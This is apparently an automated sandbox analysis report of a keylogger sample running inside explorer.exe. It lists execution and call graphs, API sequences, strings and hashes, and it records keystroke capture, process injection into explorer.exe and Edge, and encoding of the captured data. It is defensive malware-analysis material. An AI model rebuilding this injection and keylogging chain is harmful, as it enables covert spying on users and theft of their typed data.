                                                                                                                                                      execution_graph 1025 1b162b 1026 1b16aa 1025->1026 1027 1b163c 1025->1027 1027->1026 1028 1b164b GetKeyboardState 1027->1028 1028->1026 1029 1b165c ToUnicode 1028->1029 1030 1b1684 1029->1030 1030->1026 1032 1b16b9 RtlEnterCriticalSection 1030->1032 1033 1b17ce RtlLeaveCriticalSection 1032->1033 1034 1b16d2 lstrlenW 1032->1034 1033->1026 1035 1b16ed lstrlenW 1034->1035 1036 1b17bd 1034->1036 1037 1b1702 1035->1037 1036->1033 1038 1b174e GetForegroundWindow 1037->1038 1039 1b1723 1037->1039 1038->1036 1040 1b175a GetWindowTextW 1038->1040 1039->1036 1051 1b17dc 1039->1051 1042 1b177a lstrcmpW 1040->1042 1043 1b1771 GetClassNameW 1040->1043 1045 1b178b lstrcpyW 1042->1045 1046 1b17bf lstrcatW 1042->1046 1043->1042 1044 1b172f wsprintfW 1047 1b17b6 1044->1047 1048 1b17dc 4 API calls 1045->1048 1046->1036 1050 1b29eb 3 API calls 1047->1050 1049 1b1798 wsprintfW 1048->1049 1049->1047 1050->1036 1054 1b2a09 GetProcessHeap RtlAllocateHeap 1051->1054 1053 1b17ed GetLocalTime wsprintfW 1053->1044 1054->1053 771 1b29ae VirtualFree 772 1b29bd VirtualAlloc 1055 1b182d 1056 1b1838 RtlEnterCriticalSection lstrlenW 1055->1056 1057 1b18a8 RtlLeaveCriticalSection Sleep 1056->1057 1061 1b1854 1056->1061 1057->1056 1060 1b29eb VirtualQuery GetProcessHeap HeapFree 1060->1061 1061->1057 1061->1060 1064 1b25a4 1061->1064 1070 1b200d 1061->1070 1081 1b29ae VirtualFree 1061->1081 1082 1b2a09 GetProcessHeap RtlAllocateHeap 1061->1082 1065 1b25b9 CryptBinaryToStringA 1064->1065 1066 1b25e8 1064->1066 1065->1066 1067 1b25cc 1065->1067 1066->1061 1083 1b2a09 GetProcessHeap RtlAllocateHeap 1067->1083 1069 1b25d7 CryptBinaryToStringA 1069->1066 1071 1b2023 lstrlen 1070->1071 1072 1b2030 1070->1072 1071->1072 1084 1b2a09 GetProcessHeap RtlAllocateHeap 1072->1084 1074 1b2038 lstrcat 1075 1b206d lstrcat 1074->1075 1076 1b2074 1074->1076 1075->1076 1085 1b20a1 1076->1085 1079 1b29eb 3 API calls 1080 1b2097 1079->1080 1080->1061 1081->1061 1082->1061 1083->1069 1084->1074 1119 1b240f 1085->1119 1089 1b20ce 1124 1b298a lstrlen MultiByteToWideChar 1089->1124 1091 1b20dd 1125 1b24cc RtlZeroMemory 1091->1125 1094 1b212f RtlZeroMemory 1097 1b2164 1094->1097 1095 1b29eb 3 API calls 1096 1b2084 1095->1096 1096->1079 1100 1b23f1 1097->1100 1102 1b2192 1097->1102 1127 1b243d 1097->1127 1099 1b23d7 1099->1100 1101 1b29eb 3 API calls 1099->1101 1100->1095 1101->1100 1102->1099 1136 1b2a09 GetProcessHeap RtlAllocateHeap 1102->1136 1104 1b2262 wsprintfW 1105 1b2288 1104->1105 1110 1b22f5 1105->1110 1137 1b2a09 GetProcessHeap RtlAllocateHeap 1105->1137 1107 1b22c2 wsprintfW 1107->1110 1108 1b23b4 1109 1b29eb 3 API calls 1108->1109 1111 1b23c8 1109->1111 1110->1108 1138 1b2a09 GetProcessHeap RtlAllocateHeap 1110->1138 1111->1099 1113 1b29eb 3 API calls 1111->1113 1113->1099 1114 1b23ad 1117 1b29eb 3 API calls 1114->1117 1115 1b2340 1115->1114 1139 1b29bd VirtualAlloc 1115->1139 1117->1108 1118 1b239a RtlMoveMemory 1118->1114 1120 1b2419 1119->1120 1121 1b20c0 1119->1121 1122 1b2841 2 API calls 1120->1122 1123 1b2a09 GetProcessHeap RtlAllocateHeap 1121->1123 1122->1121 1123->1089 1124->1091 1126 1b20ed 1125->1126 1126->1094 1126->1100 1128 1b24ab 1127->1128 1130 1b244a 1127->1130 1128->1102 1129 1b244e DnsQuery_W 1129->1130 1130->1128 1130->1129 1131 1b248d DnsFree inet_ntoa 1130->1131 1131->1130 1132 1b24ad 1131->1132 1140 1b2a09 GetProcessHeap RtlAllocateHeap 1132->1140 1134 1b24b7 1141 1b298a lstrlen MultiByteToWideChar 1134->1141 1136->1104 1137->1107 1138->1115 1139->1118 1140->1134 1141->1128 1142 1b1581 1143 1b158e 1142->1143 1144 1b15a7 GlobalLock 1143->1144 1145 1b1623 1143->1145 1144->1145 1146 1b15b5 1144->1146 1147 1b15e4 1146->1147 1148 1b15c0 1146->1148 1163 1b293e 1147->1163 1149 1b15c5 lstrlenW 1148->1149 1150 1b15f2 1148->1150 1162 1b2a09 GetProcessHeap RtlAllocateHeap 1149->1162 1153 1b2724 VirtualQuery 1150->1153 1154 1b15fb 1153->1154 1156 1b161b GlobalUnlock 1154->1156 1157 1b15ff lstrlenW 1154->1157 1155 1b15d8 lstrcatW 1155->1150 1156->1145 1157->1156 1158 1b160a 1157->1158 1159 1b16b9 19 API calls 1158->1159 1160 1b1614 1159->1160 1161 1b29eb 3 API calls 1160->1161 1161->1156 1162->1155 1164 1b294d lstrlen 1163->1164 1165 1b2982 1163->1165 1170 1b2a09 GetProcessHeap RtlAllocateHeap 1164->1170 1165->1150 1167 1b2963 MultiByteToWideChar 1167->1165 1168 1b297b 1167->1168 1169 1b29eb 3 API calls 1168->1169 1169->1165 1170->1167 773 1b9ae0 774 1b9ca4 773->774 775 1b9aeb 773->775 774->774 776 1b9bfa LoadLibraryA 775->776 780 1b9c3f VirtualProtect VirtualProtect 775->780 777 1b9c11 776->777 777->775 779 1b9c23 GetProcAddress 777->779 779->777 781 1b9c39 779->781 780->774 782 1b1000 783 1b1010 782->783 784 1b1007 782->784 786 1b1016 784->786 829 1b2724 VirtualQuery 786->829 789 1b1098 789->783 791 1b102c RtlMoveMemory 792 1b104d 791->792 793 1b1072 GetCurrentProcessId 791->793 859 1b2a09 GetProcessHeap RtlAllocateHeap 792->859 797 1b109f 793->797 798 1b1093 793->798 795 1b1053 RtlMoveMemory 795->793 832 1b10a5 797->832 798->789 799 1b1096 798->799 860 1b13ae RtlZeroMemory VirtualQuery 799->860 801 1b10a4 803 1b2a09 GetProcessHeap RtlAllocateHeap 801->803 804 1b10bf 803->804 805 1b2a09 GetProcessHeap RtlAllocateHeap 804->805 806 1b10cc wsprintfA 805->806 811 1b10f3 806->811 807 1b276d OpenFileMappingA MapViewOfFile 807->811 808 1b129a Sleep 808->811 809 1b2841 lstrlen lstrlen 809->811 810 1b275a UnmapViewOfFile CloseHandle 810->808 811->807 811->808 811->809 812 1b2a09 GetProcessHeap RtlAllocateHeap 811->812 815 1b1285 811->815 813 1b1150 RtlMoveMemory CreateToolhelp32Snapshot 812->813 814 1b1171 Process32First 813->814 813->815 817 1b127e CloseHandle 814->817 818 1b118d 814->818 815->810 816 1b29eb VirtualQuery GetProcessHeap HeapFree 815->816 816->815 817->815 819 1b1190 CharLowerA 818->819 820 1b11ab lstrcmpiA 819->820 821 1b1266 Process32Next 819->821 820->821 822 1b11c3 820->822 821->819 821->822 822->817 822->821 823 1b12ae 16 API calls 822->823 828 1b11d6 822->828 823->822 824 1b26c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 824->828 825 1b2724 VirtualQuery 825->828 826 1b1208 lstrcmpiA 826->828 827 1b18bf 30 API calls 827->828 828->821 828->824 828->825 828->826 828->827 830 1b101e 829->830 830->789 831 1b2a09 GetProcessHeap RtlAllocateHeap 830->831 831->791 889 1b2a09 GetProcessHeap RtlAllocateHeap 832->889 834 1b10bf 890 1b2a09 GetProcessHeap RtlAllocateHeap 834->890 836 1b10cc wsprintfA 841 1b10f3 836->841 838 1b129a Sleep 838->841 839 1b2841 lstrlen lstrlen 839->841 841->838 841->839 845 1b1285 841->845 891 1b276d OpenFileMappingA 841->891 894 1b2a09 GetProcessHeap RtlAllocateHeap 841->894 843 1b1150 RtlMoveMemory CreateToolhelp32Snapshot 844 1b1171 Process32First 843->844 843->845 847 1b127e CloseHandle 844->847 848 1b118d 844->848 951 1b29eb 845->951 956 1b275a UnmapViewOfFile CloseHandle 845->956 847->845 849 1b1190 CharLowerA 848->849 850 1b11ab lstrcmpiA 849->850 851 1b1266 Process32Next 849->851 850->851 852 1b11c3 850->852 851->849 851->852 852->847 852->851 858 1b11d6 852->858 895 1b12ae 852->895 855 1b2724 VirtualQuery 855->858 856 1b1208 lstrcmpiA 856->858 858->851 858->855 858->856 914 1b26c9 OpenProcess 858->914 920 1b18bf 858->920 859->795 861 1b13e4 860->861 981 1b2a09 GetProcessHeap RtlAllocateHeap 861->981 863 1b1402 GetModuleFileNameA 982 1b2a09 GetProcessHeap RtlAllocateHeap 863->982 865 1b1418 GetCurrentProcessId wsprintfA 983 1b2799 CryptAcquireContextA 865->983 868 1b151b 870 1b29eb 3 API calls 868->870 869 1b145f RtlInitializeCriticalSection 988 1b2a09 GetProcessHeap RtlAllocateHeap 869->988 872 1b1522 870->872 874 1b29eb 3 API calls 872->874 873 1b147f Sleep 989 1b25f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 873->989 876 1b1529 RtlExitUserThread 874->876 886 1b1533 876->886 877 1b1496 GetModuleHandleA GetProcAddress 878 1b14c6 GetModuleHandleA GetProcAddress 877->878 879 1b14b5 877->879 881 1b14ea GetModuleHandleA 878->881 882 1b14d9 878->882 997 1b1f3a 879->997 1007 1b1e89 881->1007 883 1b1f3a 3 API calls 882->883 883->881 886->797 887 1b25f1 10 API calls 888 1b1501 CreateThread CloseHandle 887->888 888->868 889->834 890->836 892 1b2781 MapViewOfFile 891->892 893 1b2794 891->893 892->893 893->841 894->843 896 1b12c5 895->896 910 1b13a4 895->910 896->910 957 1b29bd VirtualAlloc 896->957 898 1b12d9 lstrlen 958 1b2a09 GetProcessHeap RtlAllocateHeap 898->958 900 1b29eb 3 API calls 907 1b1375 900->907 903 1b1399 965 1b29ae VirtualFree 903->965 904 1b1329 RtlMoveMemory 961 1b2569 904->961 905 1b1353 RtlMoveMemory 906 1b2569 2 API calls 905->906 912 1b1351 906->912 907->903 913 1b1388 PathMatchSpecA 907->913 910->852 911 1b12f0 911->912 959 1b2841 lstrlen lstrlen 911->959 912->900 913->903 913->907 915 1b271c 914->915 916 1b26e7 IsWow64Process 914->916 915->858 917 1b26f8 IsWow64Process 916->917 918 1b270a 916->918 917->918 919 1b2715 CloseHandle 917->919 918->919 919->915 921 1b2724 VirtualQuery 920->921 922 1b18d9 921->922 923 1b18eb OpenProcess 922->923 924 1b1b1c 922->924 923->924 925 1b1904 923->925 924->858 926 1b2724 VirtualQuery 925->926 927 1b190b 926->927 927->924 928 1b1919 NtSetInformationProcess 927->928 929 1b1935 927->929 928->929 966 1b1b26 929->966 932 1b1b26 2 API calls 933 1b197c 932->933 934 1b1b19 CloseHandle 933->934 935 1b1b26 2 API calls 933->935 934->924 936 1b19a6 935->936 972 1b1bbd 936->972 939 1b1b26 2 API calls 940 1b19d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 939->940 941 1b1af4 CreateRemoteThread 940->941 944 1b1a2b 940->944 942 1b1b0b CloseHandle 941->942 946 1b1b0d CloseHandle CloseHandle 942->946 943 1b1a31 CreateMutexA GetLastError 943->944 945 1b1a4d CloseHandle Sleep 943->945 944->943 947 1b1a61 GetModuleHandleA GetProcAddress ReadProcessMemory 944->947 945->943 946->934 948 1b1aed 947->948 949 1b1a92 WriteProcessMemory 947->949 948->942 948->946 949->948 950 1b1abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 949->950 950->948 952 1b2724 VirtualQuery 951->952 953 1b29f3 952->953 954 1b2a07 953->954 955 1b29f7 GetProcessHeap HeapFree 953->955 954->845 955->954 956->838 957->898 958->911 960 1b130c RtlZeroMemory 959->960 960->904 960->905 962 1b25a1 961->962 963 1b2577 lstrlen RtlMoveMemory 961->963 962->911 963->962 965->910 967 1b1b3a 966->967 969 1b195a 966->969 968 1b1b4a NtCreateSection 967->968 970 1b1b69 967->970 968->970 969->932 970->969 971 1b1b7e NtMapViewOfSection 970->971 971->969 973 1b1bd4 972->973 979 1b1c06 972->979 974 1b1bd6 RtlMoveMemory 973->974 974->974 974->979 975 1b1c69 976 1b19b6 NtUnmapViewOfSection 975->976 977 1b1c87 LdrProcessRelocationBlock 975->977 976->939 977->975 977->976 978 1b1c17 LoadLibraryA 978->976 978->979 979->975 979->978 980 1b1c47 GetProcAddress 979->980 980->976 980->979 981->863 982->865 984 1b1445 CreateMutexA GetLastError 983->984 985 1b27bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 983->985 984->868 984->869 986 1b2805 wsprintfA 985->986 986->986 987 1b2827 CryptDestroyHash CryptReleaseContext 986->987 987->984 988->873 992 1b2631 989->992 990 1b2681 CloseHandle 990->877 991 1b2671 Thread32Next 991->992 992->990 992->991 993 1b263d OpenThread 992->993 994 1b2658 SuspendThread 993->994 995 1b2660 ResumeThread 993->995 996 1b2666 CloseHandle 994->996 995->996 996->991 998 1b1f44 997->998 999 1b1fad 997->999 998->999 1016 1b1fea VirtualProtect 998->1016 999->878 1001 1b1f5b 1001->999 1017 1b29bd VirtualAlloc 1001->1017 1003 1b1f67 1004 1b1f84 1003->1004 1005 1b1f71 RtlMoveMemory 1003->1005 1018 1b1fea VirtualProtect 1004->1018 1005->1004 1008 1b2724 VirtualQuery 1007->1008 1009 1b1e93 1008->1009 1010 1b14fa 1009->1010 1019 1b1ed8 1009->1019 1010->887 1014 1b1eba 1014->1010 1024 1b1fea VirtualProtect 1014->1024 1016->1001 1017->1003 1018->999 1021 1b1eea 1019->1021 1022 1b1e9e 1019->1022 1020 1b1f04 lstrcmp 1020->1021 1020->1022 1021->1020 1021->1022 1022->1010 1023 1b1fea VirtualProtect 1022->1023 1023->1014 1024->1010

                                                                                                                                                      Callgraph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                      • Disassembly available
                                                                                                                                                      callgraph 0 Function_001B2799 1 Function_001B1016 4 Function_001B2A09 1->4 5 Function_001B268F 1->5 7 Function_001B288D 1->7 13 Function_001B18BF 1->13 23 Function_001B12AE 1->23 24 Function_001B26AE 1->24 25 Function_001B13AE 1->25 31 Function_001B10A5 1->31 32 Function_001B2724 1->32 34 Function_001B275A 1->34 38 Function_001B26C9 1->38 40 Function_001B2841 1->40 42 Function_001B29EB 1->42 46 Function_001B276D 1->46 2 Function_001B298A 3 Function_001B1E89 3->32 35 Function_001B1ED8 3->35 43 Function_001B1FEA 3->43 6 Function_001B240F 6->40 8 Function_001B200D 8->4 27 Function_001B20A1 8->27 8->42 9 Function_001B1581 9->4 12 Function_001B16B9 9->12 15 Function_001B293E 9->15 9->32 9->42 10 Function_001B1000 10->1 11 Function_001B1F3A 16 Function_001B29BD 11->16 20 Function_001B1FB4 11->20 11->43 48 Function_001B1E66 11->48 37 Function_001B17DC 12->37 12->42 17 Function_001B1BBD 13->17 30 Function_001B1B26 13->30 13->32 14 Function_001B1CBF 15->4 15->42 18 Function_001B243D 18->2 18->4 19 Function_001B1533 29 Function_001B1E26 20->29 21 Function_001B162B 21->12 22 Function_001B29AE 23->4 23->16 23->22 36 Function_001B255C 23->36 23->40 23->42 44 Function_001B2569 23->44 25->0 25->3 25->4 25->11 41 Function_001B25F1 25->41 25->42 26 Function_001B182D 26->4 26->8 26->22 33 Function_001B25A4 26->33 26->42 27->2 27->4 27->6 27->7 27->16 27->18 39 Function_001B24CC 27->39 27->42 28 Function_001B3627 29->14 31->4 31->5 31->7 31->13 31->23 31->24 31->32 31->34 31->38 31->40 31->42 31->46 33->4 37->4 42->32 45 Function_001B29E9 47 Function_001B9AE0 48->14

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 001B1016 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 193stringsleepprocessCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001B2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,001B29F3,-00000001,001B128C), ref: 001B2731
                                                                                                                                                        • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
                                                                                                                                                        • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 001B1038
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 001B106C
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001B1075
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,001B1010), ref: 001B107B
                                                                                                                                                      • wsprintfA.USER32 ref: 001B10E7
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 001B1155
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001B1160
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 001B117F
                                                                                                                                                      • CharLowerA.USER32(?), ref: 001B1199
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 001B11B5
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001B1212
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 001B126C
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 001B127F
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 001B129F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                                                      • String ID: %s%s$0-vwP,vw$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                                      • API String ID: 3206029838-2315131256
                                                                                                                                                      • Opcode ID: 7b70b25164e8e2169c1cb54b7ff73dd42dfce4d2700708fbbf5bfa7b92f48398
                                                                                                                                                      • Instruction ID: 7500cddfb38b1ad173460b7f5eb4a32dee59fa27a8e264f30fbd65b58effc8e0
                                                                                                                                                      • Opcode Fuzzy Hash: 7b70b25164e8e2169c1cb54b7ff73dd42dfce4d2700708fbbf5bfa7b92f48398
                                                                                                                                                      • Instruction Fuzzy Hash: DC511630204300ABC714FF74DC99AFA77AAEF59740F51072CF965876E1EB349E898A61
                                                                                                                                                      Function 001B10A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151stringsleepprocessCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
                                                                                                                                                        • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
                                                                                                                                                      • wsprintfA.USER32 ref: 001B10E7
                                                                                                                                                        • Part of subcall function 001B276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 001B2777
                                                                                                                                                        • Part of subcall function 001B276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,001B10FE), ref: 001B2789
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 001B1155
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001B1160
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 001B117F
                                                                                                                                                      • CharLowerA.USER32(?), ref: 001B1199
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 001B11B5
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001B1212
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 001B126C
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 001B127F
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 001B129F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                                      • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                                      • API String ID: 3018447944-2805246637
                                                                                                                                                      • Opcode ID: 50028fdb266d7cfea099b2726b6c8cbfc7956093b4a1dcc1ddec40315b3b03d0
                                                                                                                                                      • Instruction ID: 50bd99cca2d214255427482b9561ec1dcdeb6ab9cdd0498251cf5f7383a85e35
                                                                                                                                                      • Opcode Fuzzy Hash: 50028fdb266d7cfea099b2726b6c8cbfc7956093b4a1dcc1ddec40315b3b03d0
                                                                                                                                                      • Instruction Fuzzy Hash: 0C41F6302043006BC714BF74DC95AFE77AAEF99740F510B2CF966872D1EB349E498661
                                                                                                                                                      Function 001B9AE0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 123 1b9ae0-1b9ae5 124 1b9aeb-1b9af8 123->124 125 1b9cad 123->125 126 1b9b0a-1b9b0f 124->126 125->125 127 1b9b11 126->127 128 1b9b13 127->128 129 1b9b00-1b9b05 127->129 131 1b9b18-1b9b1a 128->131 130 1b9b06-1b9b08 129->130 130->126 130->127 132 1b9b1c-1b9b21 131->132 133 1b9b23-1b9b27 131->133 132->133 133->131 134 1b9b29 133->134 135 1b9b2b-1b9b32 134->135 136 1b9b34-1b9b39 134->136 135->131 135->136 137 1b9b3b-1b9b44 136->137 138 1b9b48-1b9b4a 136->138 139 1b9bba-1b9bbd 137->139 140 1b9b46 137->140 141 1b9b4c-1b9b51 138->141 142 1b9b53-1b9b57 138->142 143 1b9bc2-1b9bc5 139->143 140->138 141->142 144 1b9b59-1b9b5e 142->144 145 1b9b60-1b9b62 142->145 146 1b9bc7-1b9bc9 143->146 144->145 147 1b9b84-1b9b93 145->147 148 1b9b64 145->148 146->143 151 1b9bcb-1b9bce 146->151 149 1b9b95-1b9b9c 147->149 150 1b9ba4-1b9bb1 147->150 152 1b9b65-1b9b67 148->152 149->149 153 1b9b9e 149->153 150->150 154 1b9bb3-1b9bb5 150->154 151->143 155 1b9bd0-1b9bec 151->155 156 1b9b69-1b9b6e 152->156 157 1b9b70-1b9b74 152->157 153->130 154->130 155->146 159 1b9bee 155->159 156->157 157->152 158 1b9b76 157->158 160 1b9b78-1b9b7f 158->160 161 1b9b81 158->161 162 1b9bf4-1b9bf8 159->162 160->152 160->161 161->147 163 1b9bfa-1b9c10 LoadLibraryA 162->163 164 1b9c3f-1b9c42 162->164 165 1b9c11-1b9c16 163->165 166 1b9c45-1b9c4c 164->166 165->162 167 1b9c18-1b9c1a 165->167 168 1b9c4e-1b9c50 166->168 169 1b9c70-1b9ca0 VirtualProtect * 2 166->169 170 1b9c1c-1b9c22 167->170 171 1b9c23-1b9c30 GetProcAddress 167->171 172 1b9c63-1b9c6e 168->172 173 1b9c52-1b9c61 168->173 174 1b9ca4-1b9ca8 169->174 170->171 175 1b9c39-1b9c3c 171->175 176 1b9c32-1b9c37 171->176 172->173 173->166 174->174 177 1b9caa 174->177 176->165 177->125
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B8000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B8000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b8000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d488b3e8245f5dd440e06198a239bd18594bb895d4ad5ab0ebeba96c05777334
                                                                                                                                                      • Instruction ID: 237ad44ed6b7193e592e35a7171037d64a5b785eceb24c10b64522c233b9e024
                                                                                                                                                      • Opcode Fuzzy Hash: d488b3e8245f5dd440e06198a239bd18594bb895d4ad5ab0ebeba96c05777334
                                                                                                                                                      • Instruction Fuzzy Hash: 4A513971A542524BD7249A78DDD0BF0BBA4EB52320B280739D6E6CB3C6E7A45C07C3A0
                                                                                                                                                      Function 001B276D Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 178 1b276d-1b277f OpenFileMappingA 179 1b2781-1b2791 MapViewOfFile 178->179 180 1b2794-1b2798 178->180 179->180
                                                                                                                                                      APIs
                                                                                                                                                      • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 001B2777
                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,001B10FE), ref: 001B2789
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                                      • Opcode ID: 9131481d0b7d6e6474f8af77cbd018ee8f0c398adadb9d4a2228f2ea38294daf
                                                                                                                                                      • Instruction ID: 0d39e87dfd026253e9f78ad756ea61a8826fa57a65d472f8d16257cf00f9ac4e
                                                                                                                                                      • Opcode Fuzzy Hash: 9131481d0b7d6e6474f8af77cbd018ee8f0c398adadb9d4a2228f2ea38294daf
                                                                                                                                                      • Instruction Fuzzy Hash: B7D01732701231BBE3346A7B6C0CF83AE9DDF86AE1B010225B50DD2150D7608820C2F0
                                                                                                                                                      Function 001B2A09 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 181 1b2a09-1b2a19 GetProcessHeap RtlAllocateHeap
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: e9f20a1805c3d9711523e8cf92997345acfec40cf7fdc884f5886674109c2c86
                                                                                                                                                      • Instruction ID: d29538dbb8b24e16b15f8f154136a5f4a7cfb8b1f1685c125e086972f4b308e4
                                                                                                                                                      • Opcode Fuzzy Hash: e9f20a1805c3d9711523e8cf92997345acfec40cf7fdc884f5886674109c2c86
                                                                                                                                                      • Instruction Fuzzy Hash: 88A002B1A541106BDD4477A49D0DF197658AF44701F0046447656C54509F7555958731
                                                                                                                                                      Function 001B29BD Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 182 1b29bd-1b29cd VirtualAlloc
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,001B12D9,00000000,00000000,?,00000001), ref: 001B29C7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                      • Opcode ID: 2c3557a5b4690ddb39b8f2879aa938d3714b4fa9a6061d05c7129f8cd1229366
                                                                                                                                                      • Instruction ID: 52148b423f92c30fecce3bf2b981c07741f5d2c69f9f526cf427734038e43353
                                                                                                                                                      • Opcode Fuzzy Hash: 2c3557a5b4690ddb39b8f2879aa938d3714b4fa9a6061d05c7129f8cd1229366
